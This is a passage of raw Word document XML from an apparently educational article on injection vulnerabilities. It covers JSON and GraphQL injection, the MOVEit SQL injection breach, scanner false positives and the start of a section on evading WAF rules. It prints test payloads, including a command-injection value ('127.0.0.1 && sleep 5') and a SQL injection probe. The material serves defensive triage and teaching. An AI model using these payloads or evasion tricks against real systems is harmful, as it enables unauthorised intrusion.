    </w:p>
    <w:p w14:paraId="13E5DB6E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>JSON/REST Injections:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of breaking out of an HTML input string, payloads target key-value pairs. Attackers construct malformed JSON objects to pass unexpected data types (e.g., injecting an array or a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> expression where a string is expected) to confuse backend parsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741FD5F6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injections:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> maps queries directly to resolvers. Attackers exploit these backend database resolvers by feeding malicious strings into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> query arguments. Furthermore, because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> exposes introspection schemas by default if not hardened, attackers can completely map the backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046037C1"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architecture, making it significantly easier to craft highly precise SQL/NoSQL injection payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A47A47A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Real-World Case Study: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer Data Breach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297DD375"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 xml:space="preserve">One of the most significant and widespread modern examples of an injection vulnerability causing global systemic disruption is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer Breach</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B260226"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What Went Wrong? (The Vulnerability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2D530E"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 xml:space="preserve">In May 2023, a massive zero-day vulnerability tracked as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CVE-2023-34362</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was identified in Progress Software's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer, a widely used managed file transfer (MFT) solution. The flaw was a classic </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL Injection (SQLi)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability located within the application's web frontend components (specifically involving the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>moveitisapi.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D82577"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The application failed to properly sanitize specific inbound HTTP headers before passing them down into backend SQL execution blocks. This lack of validation allowed unauthenticated remote attackers to send crafted SQL statements via standard HTTP/HTTPS traffic. By manipulating these queries, attackers completely bypassed the application's authentication structures, granted themselves administrative access, and systematically exfiltrated data directly out of the underlying database engines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2216DA"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The Exploitation Chain &amp; Fallout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3941D"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The vulnerability was weaponized on a global scale by a sophisticated cyberespionage and ransomware group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E62488" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> After leveraging the SQL injection to bypass authentication, the threat actors altered database entries to drop an arbitrary ASP.NET web shell known as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>LEMURLOOT</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> onto the host servers. This granted them full remote code execution capabilities under an active local administrative service account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1442F5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Consequences:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>MOVEit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transfer was relied upon by large corporations, government agencies, and financial institutions to securely move highly confidential data, the blast radius was catastrophic. The breach impacted thousands of organizations worldwide, exposing the personal, medical, and financial records of over 60 million individuals. The fallout cost targeted entities billions of dollars in aggregate remediation, regulatory scrutiny, and legal liabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D598AC5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Advanced Detection &amp; False Positives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D7246"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Managing injection flaws requires distinguishing between automated noise and genuine risk, as well as understanding how attackers bypass surface-level defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D859E93" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>1. The False Positive Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21619D"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Automated security tools frequently flag "false positives" because they evaluate code structure or network signatures theoretically without understanding the functional architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAAB9AD"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Common False Positive Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A1DC11" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dead / Unreachable Code:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A SAST tool tracks a path from a raw user input string to a vulnerable raw SQL execution sink ( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>executeQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). However, the code containing the sink belongs to a legacy module that has been deprecated, has no active routing, or is completely blocked by authorization layers that the scanner's data-flow analysis couldn't trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11845730" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Complex Custom Sanitization:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Developers may build highly specialized, custom validation logic that strips out or encodes dangerous strings before they reach a sensitive database function. Because the SAST tool does not recognize this custom function as an official framework sanitizer (like an OWASP ESAPI library), it assumes the data remains "tainted" and flags it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D118C34" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Lookalike Variable Naming:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dynamic application testing (DAST) scanners often trigger on variable names or parameter keys like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . If an application accepts a parameter named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> but uses it solely as an index to lookup a hardcoded string array rather than executing it, the scanner may flag it based purely on the parameter's name and behavioral noise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C7078"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How to Manually Verify and Save Triage Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB393AB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Trace the Data Flow:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open the source code and map the route from the entry point to the execution sink. Ask: </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can a user actually hit this endpoint? Is the data altered or validated anywhere along this path?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1634EC6D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Execute a Safe Proof-of-Concept (PoC):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run a live test using a non-destructive payload designed to prove execution rather than cause damage. For instance, if a scanner flags an input field as vulnerable to OS command injection, input a payload like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>127.0.0.1 &amp;&amp; sleep 5</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . If the server response pauses for exactly five seconds, the vulnerability is confirmed as a true positive. If it returns an instant validation error, it is a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EDB42" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inspect Active Database/System Logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute the application locally while monitoring database query logs. Submit a test payload like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>test' OR '1'='2</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . If the log shows that the single quote was automatically escaped as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>test\' OR \'1\'=\'2</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the database connector, the framework is successfully neutralizing the injection, rendering the alert a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0E154B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2. Evasion Techniques (Bypassing Basic Detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053BF6F"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When organizations rely solely on weak, signature-based Web Application Firewall (WAF) regex rules to block threats, advanced attackers adapt their payloads to hide the malicious intent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3A8FE"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Character &amp; Keyword Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D6DD6F"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 xml:space="preserve">If a basic rule blocks the specific keyword </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or system terms like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
